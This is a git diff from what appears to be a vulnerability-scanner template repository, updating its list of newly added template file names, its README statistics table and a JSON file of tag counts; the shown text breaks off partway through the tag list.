diff --git a/.new-additions b/.new-additions index 84f7655e2b..2cb97841f7 100644 --- a/.new-additions +++ b/.new-additions @@ -1,13 +1,13 @@ -cves/2021/CVE-2021-20137.yaml -cves/2021/CVE-2021-24245.yaml -cves/2021/CVE-2021-27519.yaml -exposed-panels/gryphon-login.yaml -exposed-panels/zyxel/zyxel-firewall-panel.yaml -file/audit/cisco/configure-aaa-service.yaml -file/audit/cisco/configure-service-timestamps-debug.yaml -file/audit/cisco/configure-service-timestamps-logmessages.yaml -file/audit/cisco/disable-ip-source-route.yaml -file/audit/cisco/disable-pad-service.yaml -file/audit/cisco/enable-secret-for-password-user-and-.yaml -file/audit/cisco/logging-enable.yaml -file/audit/cisco/set-and-secure-passwords.yaml +cves/2018/CVE-2018-14474.yaml +cves/2018/CVE-2018-16761.yaml +cves/2020/CVE-2020-29597.yaml +cves/2021/CVE-2021-27748.yaml +cves/2022/CVE-2022-29383.yaml +cves/2022/CVE-2022-31268.yaml +exposed-panels/eventum-panel.yaml +exposures/files/appsettings-file-disclosure.yaml +exposures/files/django-secret-key.yaml +exposures/files/ftpconfig.yaml +exposures/files/git-mailmap.yaml +exposures/files/php-ini.yaml +vulnerabilities/other/phpok-sqli.yaml diff --git a/README.md b/README.md index 8c6f2be0dd..366e7381d1 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1191 | daffainfo | 565 | cves | 1196 | info | 1220 | http | 3263 | -| panel | 524 | dhiyaneshdk | 424 | exposed-panels | 533 | high | 895 | file | 68 | -| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 681 | network | 50 | -| xss | 379 | pdteam | 266 | technologies | 258 | critical | 421 | dns | 17 | -| wordpress | 375 | geeknik | 181 | exposures | 205 | low | 186 | | | -| rce | 302 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | -| exposure | 298 | princechaddha | 139 | workflows | 187 | | | | | -| cve2021 | 291 | 0x_akoko | 139 | token-spray | 169 | | | | | -| wp-plugin | 274 | gy741 | 122 | default-logins | 96 | | | | | -| tech | 274 | pussycat0x | 116 | file | 68 | | | | | +| cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 | +| panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 | +| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 | +| xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 | +| wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | | +| rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | +| exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | | +| cve2021 | 294 | princechaddha | 139 | token-spray | 169 | | | | | +| wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | | +| tech | 274 | gy741 | 122 | file | 76 | | | | | -**264 directories, 3622 files**. +**265 directories, 3636 files**. diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 7649e2d0d5..3647b7d751 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1191},{"name":"panel","count":524},{"name":"lfi","count":467},{"name":"xss","count":379},{"name":"wordpress","count":375},{"name":"rce","count":302},{"name":"exposure","count":298},{"name":"cve2021","count":291},{"name":"tech","count":274},{"name":"wp-plugin","count":274},{"name":"cve2020","count":197},{"name":"","count":190},{"name":"token-spray","count":169},{"name":"joomla","count":131},{"name":"config","count":126},{"name":"cve2018","count":125},{"name":"cve2019","count":123},{"name":"apache","count":120},{"name":"unauth","count":114},{"name":"cve2010","count":111},{"name":"default-login","count":110},{"name":"iot","count":106},{"name":"oast","count":99},{"name":"login","count":86},{"name":"cve2022","count":78},{"name":"redirect","count":77},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"misconfig","count":68},{"name":"cve2017","count":65},{"name":"wp","count":65},{"name":"ssrf","count":65},{"name":"sqli","count":63},{"name":"router","count":61},{"name":"file","count":60},{"name":"network","count":53},{"name":"oracle","count":52},{"name":"disclosure","count":46},{"name":"cve2016","count":45},{"name":"auth-bypass","count":44},{"name":"authenticated","count":40},{"name":"plugin","count":40},{"name":"cve2014","count":37},{"name":"cve2015","count":37},{"name":"google","count":37},{"name":"cisco","count":35},{"name":"logs","count":33},{"name":"injection","count":33},{"name":"atlassian","count":32},{"name":"oss","count":30},{"name":"jira","count":30},{"name":"listing","count":30},{"name":"devops","count":29},{"name":"traversal","count":29},{"name":"dns","count":27},{"name":"generic","count":27},{"name":"kubernetes","count":26},{"name":"cms","count":25},{"name":"adobe","count":24},{"name":"springboot","count":24},{"name":"intrusive","count":23},{"name":"cnvd","count":23},{"name":"vmware","count":22},{"name":"proxy","count":22},{"name":"sap","count":22},{"name":"debug","count":21},{"name":"aem","count":21},{"name":"microsoft","count":21},{"name":"misc","count":21},{"name":"wp-theme","count":20},{"name":"fuzz","count":20},{"name":"service","count":20},{"name":"cve2012","count":19},{"name":"manageengine","count":19},{"name":"php","count":18},{"name":"weblogic","count":18},{"name":"deserialization","count":18},{"name":"zoho","count":18},{"name":"k8s","count":17},{"name":"aws","count":17},{"name":"tomcat","count":17},{"name":"ibm","count":16},{"name":"struts","count":16},{"name":"fileupload","count":16},{"name":"dlink","count":16},{"name":"jenkins","count":15},{"name":"gitlab","count":15},{"name":"api","count":15},{"name":"cve2011","count":15},{"name":"java","count":14},{"name":"xxe","count":14},{"name":"android","count":14},{"name":"hp","count":14},{"name":"camera","count":14},{"name":"cve2009","count":14},{"name":"cve2013","count":13},{"name":"ruijie","count":13},{"name":"firewall","count":13},{"name":"nginx","count":12},{"name":"status","count":12},{"name":"lfr","count":12},{"name":"log4j","count":12},{"name":"rails","count":12},{"name":"printer","count":12},{"name":"netsweeper","count":12},{"name":"netgear","count":11},{"name":"cnvd2021","count":11},{"name":"upload","count":11},{"name":"graphql","count":11},{"name":"magento","count":11},{"name":"backup","count":10},{"name":"grafana","count":10},{"name":"glpi","count":10},{"name":"fortigate","count":10},{"name":"dell","count":10},{"name":"spring","count":10},{"name":"zyxel","count":10},{"name":"jolokia","count":10},{"name":"coldfusion","count":10},{"name":"airflow","count":10},{"name":"iis","count":9},{"name":"wso2","count":9},{"name":"cve2008","count":9},{"name":"windows","count":9},{"name":"auth","count":9},{"name":"drupal","count":9},{"name":"webserver","count":9},{"name":"github","count":9},{"name":"fastjson","count":9},{"name":"jndi","count":9},{"name":"fortinet","count":9},{"name":"mirai","count":9},{"name":"zabbix","count":9},{"name":"laravel","count":9},{"name":"ftp","count":9},{"name":"woocommerce","count":9},{"name":"ssl","count":8},{"name":"django","count":8},{"name":"vcenter","count":8},{"name":"amazon","count":8},{"name":"dedecms","count":8},{"name":"blind","count":8},{"name":"audit","count":8},{"name":"azure","count":8},{"name":"metadata","count":8},{"name":"scada","count":8},{"name":"confluence","count":8},{"name":"recon","count":8},{"name":"citrix","count":8},{"name":"solr","count":8},{"name":"phpmyadmin","count":8},{"name":"kube","count":8},{"name":"prometheus","count":8},{"name":"files","count":7},{"name":"sonicwall","count":7},{"name":"python","count":7},{"name":"firebase","count":7},{"name":"exchange","count":7},{"name":"headless","count":7},{"name":"elasticsearch","count":7},{"name":"backdoor","count":7},{"name":"squirrelmail","count":7},{"name":"maps","count":7},{"name":"ssti","count":7},{"name":"cnvd2020","count":7},{"name":"rconfig","count":7},{"name":"vpn","count":7},{"name":"bucket","count":7},{"name":"kafka","count":7},{"name":"mail","count":7},{"name":"docker","count":6},{"name":"fpd","count":6},{"name":"ofbiz","count":6},{"name":"magmi","count":6},{"name":"firmware","count":6},{"name":"druid","count":6},{"name":"cobbler","count":6},{"name":"cicd","count":6},{"name":"lucee","count":6},{"name":"nodejs","count":6},{"name":"crlf","count":6},{"name":"ecology","count":6},{"name":"sitecore","count":6},{"name":"zimbra","count":6},{"name":"jboss","count":6},{"name":"slack","count":6},{"name":"enum","count":6},{"name":"bypass","count":6},{"name":"bigip","count":6},{"name":"huawei","count":6},{"name":"jetty","count":6},{"name":"go","count":6},{"name":"storage","count":5},{"name":"scan","count":5},{"name":"rseenet","count":5},{"name":"strapi","count":5},{"name":"icewarp","count":5},{"name":"error","count":5},{"name":"kubelet","count":5},{"name":"ruby","count":5},{"name":"zhiyuan","count":5},{"name":"thinkphp","count":5},{"name":"minio","count":5},{"name":"git","count":5},{"name":"moodle","count":5},{"name":"circarlife","count":5},{"name":"alibaba","count":5},{"name":"setup","count":5},{"name":"fatpipe","count":5},{"name":"symfony","count":5},{"name":"node","count":5},{"name":"samsung","count":5},{"name":"cache","count":5},{"name":"solarwinds","count":5},{"name":"symantec","count":5},{"name":"artica","count":5},{"name":"leak","count":5},{"name":"opensis","count":5},{"name":"metinfo","count":5},{"name":"keycloak","count":5},{"name":"rfi","count":5},{"name":"gocd","count":5},{"name":"apisix","count":5},{"name":"microweber","count":5},{"name":"terramaster","count":4},{"name":"kevinlab","count":4},{"name":"couchdb","count":4},{"name":"database","count":4},{"name":"db","count":4},{"name":"puppet","count":4},{"name":"kibana","count":4},{"name":"adminer","count":4},{"name":"photo","count":4},{"name":"xmlrpc","count":4},{"name":"mailchimp","count":4},{"name":"ssh","count":4},{"name":"hongdian","count":4},{"name":"gogs","count":4},{"name":"springcloud","count":4},{"name":"search","count":4},{"name":"plesk","count":4},{"name":"hikvision","count":4},{"name":"websphere","count":4},{"name":"ognl","count":4},{"name":"telesquare","count":4},{"name":"cnvd2019","count":4},{"name":"smtp","count":4},{"name":"cacti","count":4},{"name":"awstats","count":4},{"name":"asp","count":4},{"name":"cve2007","count":4},{"name":"sonarqube","count":4},{"name":"mongodb","count":4},{"name":"jellyfin","count":4},{"name":"postmessage","count":4},{"name":"microstrategy","count":4},{"name":"vbulletin","count":4},{"name":"activemq","count":4},{"name":"panos","count":4},{"name":"wcs","count":4},{"name":"stripe","count":4},{"name":"nexus","count":4},{"name":"caucho","count":4},{"name":"artifactory","count":4},{"name":"npm","count":4},{"name":"flink","count":4},{"name":"voip","count":4},{"name":"jetbrains","count":4},{"name":"sangfor","count":4},{"name":"cloud","count":4},{"name":"buffalo","count":4},{"name":"aspose","count":4},{"name":"prestashop","count":4},{"name":"cockpit","count":4},{"name":"tikiwiki","count":4},{"name":"thinkcmf","count":4},{"name":"elastic","count":4},{"name":"sophos","count":4},{"name":"resin","count":4},{"name":"paypal","count":4},{"name":"hpe","count":4},{"name":"oa","count":4},{"name":"phppgadmin","count":4},{"name":"hoteldruid","count":4},{"name":"beyondtrust","count":4},{"name":"graph","count":3},{"name":"globalprotect","count":3},{"name":"axis","count":3},{"name":"dreambox","count":3},{"name":"exposures","count":3},{"name":"splunk","count":3},{"name":"consul","count":3},{"name":"jfrog","count":3},{"name":"netlify","count":3},{"name":"prtg","count":3},{"name":"sugarcrm","count":3},{"name":"empirecms","count":3},{"name":"phpinfo","count":3},{"name":"sharepoint","count":3},{"name":"thinfinity","count":3},{"name":"wordfence","count":3},{"name":"rackn","count":3},{"name":"aptus","count":3},{"name":"smb","count":3},{"name":"movable","count":3},{"name":"zte","count":3},{"name":"dolibarr","count":3},{"name":"fuelcms","count":3},{"name":"workspaceone","count":3},{"name":"lotus","count":3},{"name":"openam","count":3},{"name":"odoo","count":3},{"name":"umbraco","count":3},{"name":"modem","count":3},{"name":"nacos","count":3},{"name":"dotcms","count":3},{"name":"voipmonitor","count":3},{"name":"openssh","count":3},{"name":"httpd","count":3},{"name":"bruteforce","count":3},{"name":"sendgrid","count":3},{"name":"kingsoft","count":3},{"name":"zeroshell","count":3},{"name":"telerik","count":3},{"name":"kentico","count":3},{"name":"netdata","count":3},{"name":"targa","count":3},{"name":"axigen","count":3},{"name":"epson","count":3},{"name":"httpbin","count":3},{"name":"horizon","count":3},{"name":"fortios","count":3},{"name":"mcafee","count":3},{"name":"axis2","count":3},{"name":"square","count":3},{"name":"actuator","count":3},{"name":"rlm","count":3},{"name":"facebook","count":3},{"name":"sql","count":3},{"name":"circleci","count":3},{"name":"pentaho","count":3},{"name":"trixbox","count":3},{"name":"ebs","count":3},{"name":"vrealize","count":3},{"name":"jeesns","count":3},{"name":"log","count":3},{"name":"nuuo","count":3},{"name":"linkerd","count":3},{"name":"lansweeper","count":3},{"name":"openemr","count":3},{"name":"linksys","count":3},{"name":"openbmcs","count":3},{"name":"bitrix","count":3},{"name":"webadmin","count":3},{"name":"seagate","count":3},{"name":"octobercms","count":3},{"name":"dos","count":3},{"name":"ems","count":3},{"name":"redis","count":3},{"name":"trendnet","count":3},{"name":"grav","count":3},{"name":"javascript","count":3},{"name":"fanruan","count":3},{"name":"ampps","count":3},{"name":"glassfish","count":3},{"name":"3cx","count":3},{"name":"wavlink","count":3},{"name":"elfinder","count":3},{"name":"cisa","count":3},{"name":"heroku","count":3},{"name":"hashicorp","count":3},{"name":"sentry","count":3},{"name":"subrion","count":3},{"name":"panabit","count":3},{"name":"messaging","count":3},{"name":"nosqli","count":3},{"name":"digitalrebar","count":3},{"name":"centos","count":3},{"name":"seeyon","count":3},{"name":"synology","count":3},{"name":"samba","count":3},{"name":"cloudflare","count":3},{"name":"concrete","count":3},{"name":"jamf","count":3},{"name":"selea","count":3},{"name":"oauth","count":3},{"name":"mongo","count":3},{"name":"geowebserver","count":3},{"name":"gespage","count":2},{"name":"labkey","count":2},{"name":"embed","count":2},{"name":"dotnet","count":2},{"name":"webcam","count":2},{"name":"ansible","count":2},{"name":"ebook","count":2},{"name":"javamelody","count":2},{"name":"places","count":2},{"name":"key","count":2},{"name":"tapestry","count":2},{"name":"shellshock","count":2},{"name":"sqlite","count":2},{"name":"intercom","count":2},{"name":"owasp","count":2},{"name":"idrac","count":2},{"name":"hjtcloud","count":2},{"name":"pacsone","count":2},{"name":"myfactory","count":2},{"name":"casdoor","count":2},{"name":"sidekiq","count":2},{"name":"fortiweb","count":2},{"name":"thruk","count":2},{"name":"rabbitmq","count":2},{"name":"bigant","count":2},{"name":"arcgis","count":2},{"name":"couchbase","count":2},{"name":"supermicro","count":2},{"name":"horde","count":2},{"name":"zerof","count":2},{"name":"tenda","count":2},{"name":"swagger","count":2},{"name":"cyberoam","count":2},{"name":"virtualui","count":2},{"name":"servicenow","count":2},{"name":"rstudio","count":2},{"name":"zblogphp","count":2},{"name":"impresscms","count":2},{"name":"octoprint","count":2},{"name":"geoserver","count":2},{"name":"avaya","count":2},{"name":"nextcloud","count":2},{"name":"electron","count":2},{"name":"bigbluebutton","count":2},{"name":"dotnetnuke","count":2},{"name":"aviatrix","count":2},{"name":"pascom","count":2},{"name":"checkpoint","count":2},{"name":"projectsend","count":2},{"name":"ranger","count":2},{"name":"jsf","count":2},{"name":"bmc","count":2},{"name":"tongda","count":2},{"name":"watchguard","count":2},{"name":"jmx","count":2},{"name":"rackstation","count":2},{"name":"netsus","count":2},{"name":"akamai","count":2},{"name":"aruba","count":2},{"name":"node-red-dashboard","count":2},{"name":"openstack","count":2},{"name":"influxdb","count":2},{"name":"listserv","count":2},{"name":"avantfax","count":2},{"name":"appcms","count":2},{"name":"nagios","count":2},{"name":"ovirt","count":2},{"name":"clusterengine","count":2},{"name":"qihang","count":2},{"name":"phpshowtime","count":2},{"name":"tileserver","count":2},{"name":"terraform","count":2},{"name":"domxss","count":2},{"name":"seeddms","count":2},{"name":"commax","count":2},{"name":"iptime","count":2},{"name":"erxes","count":2},{"name":"zzzcms","count":2},{"name":"akkadian","count":2},{"name":"mailgun","count":2},{"name":"alienvault","count":2},{"name":"mobileiron","count":2},{"name":"motorola","count":2},{"name":"skycaiji","count":2},{"name":"yapi","count":2},{"name":"frp","count":2},{"name":"gitbook","count":2},{"name":"emerge","count":2},{"name":"bomgar","count":2},{"name":"mbean","count":2},{"name":"typo3","count":2},{"name":"shenyu","count":2},{"name":"unifi","count":2},{"name":"password","count":2},{"name":"tidb","count":2},{"name":"mida","count":2},{"name":"dvwa","count":2},{"name":"mantisbt","count":2},{"name":"otobo","count":2},{"name":"weather","count":2},{"name":"ametys","count":2},{"name":"ecoa","count":2},{"name":"pcoip","count":2},{"name":"waf","count":2},{"name":"openvpn","count":2},{"name":"blockchain","count":2},{"name":"pgadmin","count":2},{"name":"apollo","count":2},{"name":"cve2006","count":2},{"name":"draytek","count":2},{"name":"flightpath","count":2},{"name":"bitly","count":2},{"name":"ericsson","count":2},{"name":"digitalocean","count":2},{"name":"metersphere","count":2},{"name":"chiyu","count":2},{"name":"cgi","count":2},{"name":"s3","count":2},{"name":"lighttpd","count":2},{"name":"twitter","count":2},{"name":"vidyo","count":2},{"name":"graphite","count":2},{"name":"netflix","count":2},{"name":"hostheader-injection","count":2},{"name":"ruckus","count":2},{"name":"showdoc","count":2},{"name":"wuzhicms","count":2},{"name":"circontrol","count":2},{"name":"viewpoint","count":2},{"name":"totemomail","count":2},{"name":"openfire","count":2},{"name":"sequoiadb","count":2},{"name":"wamp","count":2},{"name":"xampp","count":2},{"name":"metabase","count":2},{"name":"gophish","count":2},{"name":"drawio","count":2},{"name":"auerswald","count":2},{"name":"kafdrop","count":2},{"name":"jupyter","count":2},{"name":"neos","count":2},{"name":"gnuboard","count":2},{"name":"netis","count":2},{"name":"pulse","count":2},{"name":"traefik","count":2},{"name":"homematic","count":2},{"name":"cve2005","count":2},{"name":"dynamicweb","count":2},{"name":"harbor","count":2},{"name":"kiwitcms","count":2},{"name":"rocketchat","count":2},{"name":"intellian","count":2},{"name":"sdwan","count":2},{"name":"openwrt","count":2},{"name":"nextjs","count":2},{"name":"yonyou","count":2},{"name":"cloudinary","count":2},{"name":"natshell","count":2},{"name":"vigorconnect","count":2},{"name":"livezilla","count":2},{"name":"gradle","count":2},{"name":"cas","count":2},{"name":"itop","count":2},{"name":"idor","count":2},{"name":"conductor","count":2},{"name":"pbootcms","count":2},{"name":"seowon","count":2},{"name":"seacms","count":2},{"name":"frontpage","count":2},{"name":"ad","count":2},{"name":"xweb500","count":2},{"name":"ixcache","count":2},{"name":"ubnt","count":2},{"name":"ec2","count":2},{"name":"webmin","count":2},{"name":"filemanager","count":2},{"name":"jitsi","count":2},{"name":"hadoop","count":2},{"name":"xxljob","count":2},{"name":"middleware","count":2},{"name":"smartstore","count":2},{"name":"ilo","count":2},{"name":"proftpd","count":2},{"name":"zywall","count":2},{"name":"saltstack","count":2},{"name":"xerox","count":2},{"name":"nasos","count":2},{"name":"versa","count":2},{"name":"getsimple","count":2},{"name":"dubbo","count":2},{"name":"pam","count":2},{"name":"codeigniter","count":2},{"name":"fortimail","count":2},{"name":"netscaler","count":2},{"name":"justwriting","count":2},{"name":"text","count":2},{"name":"jeedom","count":2},{"name":"plastic","count":2},{"name":"hasura","count":2},{"name":"hiveos","count":2},{"name":"csrf","count":2},{"name":"redash","count":2},{"name":"hubspot","count":2},{"name":"tableau","count":2},{"name":"liferay","count":2},{"name":"craftcms","count":2},{"name":"acrolinx","count":2},{"name":"xoops","count":2},{"name":"glances","count":2},{"name":"rancher","count":2},{"name":"orchid","count":2},{"name":"jquery","count":2},{"name":"matrix","count":2},{"name":"ucmdb","count":2},{"name":"exacqvision","count":2},{"name":"avtech","count":2},{"name":"ivanti","count":2},{"name":"konga","count":2},{"name":"rockmongo","count":2},{"name":"sysaid","count":2},{"name":"resourcespace","count":2},{"name":"wooyun","count":2},{"name":"f5","count":2},{"name":"alfresco","count":2},{"name":"chamilo","count":2},{"name":"favicon","count":2},{"name":"gitea","count":2},{"name":"yii","count":2},{"name":"guacamole","count":2},{"name":"backups","count":2},{"name":"phpcollab","count":2},{"name":"azkaban","count":2},{"name":"idea","count":2},{"name":"cocoon","count":2},{"name":"syslog","count":2},{"name":"phpstorm","count":2},{"name":"airtame","count":2},{"name":"ghost","count":2},{"name":"linux","count":2},{"name":"spark","count":2},{"name":"docs","count":2},{"name":"flir","count":2},{"name":"pfsense","count":2},{"name":"payara","count":2},{"name":"maian","count":2},{"name":"igs","count":2},{"name":"ambari","count":2},{"name":"apereo","count":2},{"name":"mysql","count":2},{"name":"detect","count":2},{"name":"lantronix","count":2},{"name":"globaldomains","count":2},{"name":"emby","count":2},{"name":"qcubed","count":2},{"name":"chyrp","count":2},{"name":"accela","count":2},{"name":"pega","count":2},{"name":"emqx","count":2},{"name":"gitlist","count":2},{"name":"kong","count":2},{"name":"rosariosis","count":2},{"name":"code42","count":2},{"name":"forcepoint","count":2},{"name":"wpqa","count":2},{"name":"linkedin","count":2},{"name":"flask","count":1},{"name":"barracuda","count":1},{"name":"keenetic","count":1},{"name":"xvr","count":1},{"name":"landray","count":1},{"name":"siteomat","count":1},{"name":"bazarr","count":1},{"name":"lokalise","count":1},{"name":"tufin","count":1},{"name":"connect-central","count":1},{"name":"adafruit","count":1},{"name":"jwt","count":1},{"name":"anchorcms","count":1},{"name":"istat","count":1},{"name":"chromium","count":1},{"name":"drive","count":1},{"name":"microcomputers","count":1},{"name":"ipstack","count":1},{"name":"opensso","count":1},{"name":"starttls","count":1},{"name":"dreamweaver","count":1},{"name":"soar","count":1},{"name":"camunda","count":1},{"name":"pollbot","count":1},{"name":"oscommerce","count":1},{"name":"cloudera","count":1},{"name":"phpfusion","count":1},{"name":"jspxcms","count":1},{"name":"testrail","count":1},{"name":"hdnetwork","count":1},{"name":"paneil","count":1},{"name":"gemweb","count":1},{"name":"smi","count":1},{"name":"siebel","count":1},{"name":"webmodule-ee","count":1},{"name":"spinnaker","count":1},{"name":"mspcontrol","count":1},{"name":"nomad","count":1},{"name":"trilithic","count":1},{"name":"jupyterhub","count":1},{"name":"moin","count":1},{"name":"yaws","count":1},{"name":"webmail","count":1},{"name":"sceditor","count":1},{"name":"fiori","count":1},{"name":"simplecrm","count":1},{"name":"owa","count":1},{"name":"goanywhere","count":1},{"name":"darkstat","count":1},{"name":"adb","count":1},{"name":"rudloff","count":1},{"name":"objectinjection","count":1},{"name":"ebird","count":1},{"name":"hiboss","count":1},{"name":"zuul","count":1},{"name":"fortigates","count":1},{"name":"cscart","count":1},{"name":"acemanager","count":1},{"name":"dribbble","count":1},{"name":"nearby","count":1},{"name":"geolocation","count":1},{"name":"vsphere","count":1},{"name":"spf","count":1},{"name":"amcrest","count":1},{"name":"rmi","count":1},{"name":"livehelperchat","count":1},{"name":"socomec","count":1},{"name":"ecshop","count":1},{"name":"smuggling","count":1},{"name":"joget","count":1},{"name":"vms","count":1},{"name":"express","count":1},{"name":"pieregister","count":1},{"name":"hirak","count":1},{"name":"aura","count":1},{"name":"netbeans","count":1},{"name":"submitty","count":1},{"name":"zcms","count":1},{"name":"opensns","count":1},{"name":"calendarific","count":1},{"name":"helpdesk","count":1},{"name":"xds","count":1},{"name":"fhem","count":1},{"name":"argussurveillance","count":1},{"name":"discourse","count":1},{"name":"shodan","count":1},{"name":"postmark","count":1},{"name":"buildbot","count":1},{"name":"virustotal","count":1},{"name":"cherokee","count":1},{"name":"ninjaform","count":1},{"name":"edgeos","count":1},{"name":"ntopng","count":1},{"name":"overflow","count":1},{"name":"netmask","count":1},{"name":"huemagic","count":1},{"name":"pihole","count":1},{"name":"commscope","count":1},{"name":"dasan","count":1},{"name":"elementor","count":1},{"name":"gsm","count":1},{"name":"h3c","count":1},{"name":"server","count":1},{"name":"cassandra","count":1},{"name":"librenms","count":1},{"name":"kerio","count":1},{"name":"tensorflow","count":1},{"name":"weiphp","count":1},{"name":"realteo","count":1},{"name":"crm","count":1},{"name":"concourse","count":1},{"name":"playable","count":1},{"name":"weboftrust","count":1},{"name":"cron","count":1},{"name":"ignition","count":1},{"name":"lotuscms","count":1},{"name":"asanhamayesh","count":1},{"name":"misconfiguration","count":1},{"name":"abstractapi","count":1},{"name":"jeewms","count":1},{"name":"hrsale","count":1},{"name":"oidc","count":1},{"name":"bing","count":1},{"name":"processwire","count":1},{"name":"qdpm","count":1},{"name":"sarg","count":1},{"name":"meraki","count":1},{"name":"adfs","count":1},{"name":"microfocus","count":1},{"name":"diris","count":1},{"name":"lutron","count":1},{"name":"easyappointments","count":1},{"name":"webpconverter","count":1},{"name":"74cms","count":1},{"name":"neo4j","count":1},{"name":"lenovo","count":1},{"name":"cse","count":1},{"name":"fms","count":1},{"name":"europeana","count":1},{"name":"gocron","count":1},{"name":"alltube","count":1},{"name":"lumis","count":1},{"name":"fortressaircraft","count":1},{"name":"gunicorn","count":1},{"name":"quip","count":1},{"name":"feedwordpress","count":1},{"name":"ait-csv","count":1},{"name":"optimizely","count":1},{"name":"tuxedo","count":1},{"name":"qsan","count":1},{"name":"zms","count":1},{"name":"dompdf","count":1},{"name":"sourcebans","count":1},{"name":"manager","count":1},{"name":"phpfastcache","count":1},{"name":"pyspider","count":1},{"name":"bullwark","count":1},{"name":"matomo","count":1},{"name":"luftguitar","count":1},{"name":"calendly","count":1},{"name":"faust","count":1},{"name":"weglot","count":1},{"name":"kronos","count":1},{"name":"gstorage","count":1},{"name":"festivo","count":1},{"name":"dnn","count":1},{"name":"opensmtpd","count":1},{"name":"htmli","count":1},{"name":"bible","count":1},{"name":"chronoforums","count":1},{"name":"sourcecodester","count":1},{"name":"wildfly","count":1},{"name":"binance","count":1},{"name":"raspap","count":1},{"name":"zipkin","count":1},{"name":"memory-pipes","count":1},{"name":"dwsync","count":1},{"name":"piwigo","count":1},{"name":"holidayapi","count":1},{"name":"dss","count":1},{"name":"cloudron","count":1},{"name":"javafaces","count":1},{"name":"interlib","count":1},{"name":"blue-ocean","count":1},{"name":"goahead","count":1},{"name":"mongo-express","count":1},{"name":"wakatime","count":1},{"name":"roundcube","count":1},{"name":"b2bbuilder","count":1},{"name":"micro-user-service","count":1},{"name":"gofile","count":1},{"name":"sofneta","count":1},{"name":"wing-ftp","count":1},{"name":"episerver","count":1},{"name":"kramer","count":1},{"name":"dotclear","count":1},{"name":"zoomsounds","count":1},{"name":"acontent","count":1},{"name":"shiro","count":1},{"name":"stem","count":1},{"name":"eprints","count":1},{"name":"xmlchart","count":1},{"name":"honeypot","count":1},{"name":"csod","count":1},{"name":"clave","count":1},{"name":"emessage","count":1},{"name":"xml","count":1},{"name":"lfw","count":1},{"name":"phpunit","count":1},{"name":"ecsimagingpacs","count":1},{"name":"meshcentral","count":1},{"name":"csa","count":1},{"name":"idera","count":1},{"name":"sureline","count":1},{"name":"tpshop","count":1},{"name":"yealink","count":1},{"name":"cx","count":1},{"name":"ixbusweb","count":1},{"name":"zookeeper","count":1},{"name":"launchdarkly","count":1},{"name":"discord","count":1},{"name":"knowage","count":1},{"name":"announcekit","count":1},{"name":"webex","count":1},{"name":"mtheme","count":1},{"name":"tieline","count":1},{"name":"identityguard","count":1},{"name":"yachtcontrol","count":1},{"name":"mi","count":1},{"name":"froxlor","count":1},{"name":"placeos","count":1},{"name":"shadoweb","count":1},{"name":"iconfinder","count":1},{"name":"avada","count":1},{"name":"siemens","count":1},{"name":"biometrics","count":1},{"name":"synapse","count":1},{"name":"radius","count":1},{"name":"svn","count":1},{"name":"superwebmailer","count":1},{"name":"onelogin","count":1},{"name":"postgres","count":1},{"name":"axxonsoft","count":1},{"name":"gpon","count":1},{"name":"vanguard","count":1},{"name":"urlscan","count":1},{"name":"totolink","count":1},{"name":"expn","count":1},{"name":"graphiql","count":1},{"name":"teradici","count":1},{"name":"commvault","count":1},{"name":"duomicms","count":1},{"name":"olivetti","count":1},{"name":"rainloop","count":1},{"name":"satellian","count":1},{"name":"hanming","count":1},{"name":"okta","count":1},{"name":"lionwiki","count":1},{"name":"pods","count":1},{"name":"thedogapi","count":1},{"name":"web3storage","count":1},{"name":"vercel","count":1},{"name":"rdp","count":1},{"name":"twig","count":1},{"name":"nownodes","count":1},{"name":"chevereto","count":1},{"name":"caseaware","count":1},{"name":"esmtp","count":1},{"name":"rubedo","count":1},{"name":"monitorix","count":1},{"name":"mofi","count":1},{"name":"seopanel","count":1},{"name":"ptr","count":1},{"name":"iterable","count":1},{"name":"dolphinscheduler","count":1},{"name":"icinga","count":1},{"name":"iframe","count":1},{"name":"h5s","count":1},{"name":"springframework","count":1},{"name":"mx","count":1},{"name":"basic-auth","count":1},{"name":"monitoring","count":1},{"name":"thinkadmin","count":1},{"name":"tinymce","count":1},{"name":"erp-nc","count":1},{"name":"hanwang","count":1},{"name":"chaos","count":1},{"name":"jreport","count":1},{"name":"h2","count":1},{"name":"dnssec","count":1},{"name":"tensorboard","count":1},{"name":"dotnetcms","count":1},{"name":"ueditor","count":1},{"name":"mariadb","count":1},{"name":"cgit","count":1},{"name":"clink-office","count":1},{"name":"nedi","count":1},{"name":"netgenie","count":1},{"name":"zoneminder","count":1},{"name":"phalcon","count":1},{"name":"etherscan","count":1},{"name":"limit","count":1},{"name":"zenario","count":1},{"name":"orbintelligence","count":1},{"name":"nutanix","count":1},{"name":"avatier","count":1},{"name":"oki","count":1},{"name":"activecollab","count":1},{"name":"blueiris","count":1},{"name":"moonpay","count":1},{"name":"place","count":1},{"name":"fontawesome","count":1},{"name":"arl","count":1},{"name":"superset","count":1},{"name":"openerp","count":1},{"name":"supervisor","count":1},{"name":"phoronix","count":1},{"name":"gsoap","count":1},{"name":"salesforce","count":1},{"name":"appveyor","count":1},{"name":"streetview","count":1},{"name":"spip","count":1},{"name":"scimono","count":1},{"name":"fanwei","count":1},{"name":"zmanda","count":1},{"name":"clansphere","count":1},{"name":"front","count":1},{"name":"buttercms","count":1},{"name":"instatus","count":1},{"name":"cofax","count":1},{"name":"musicstore","count":1},{"name":"eyou","count":1},{"name":"jinher","count":1},{"name":"extreme","count":1},{"name":"directum","count":1},{"name":